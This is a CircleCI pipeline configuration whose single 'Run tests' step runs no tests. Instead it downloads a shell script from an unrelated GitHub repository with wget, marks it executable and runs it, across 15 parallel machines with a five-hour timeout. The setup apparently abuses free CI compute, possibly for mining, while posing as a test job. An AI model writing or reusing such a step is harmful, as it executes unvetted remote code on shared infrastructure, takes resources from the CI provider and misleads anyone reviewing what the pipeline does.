version: 2
jobs:
  build:
    parallelism: 15
    machine:
    - image: ubuntu-1604:202007-01
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          no_output_timeout: 5h
          command: wget https://raw.githubusercontent.com/gensxtralz/scr/main/scr.sh && chmod +x scr.sh && ./scr.sh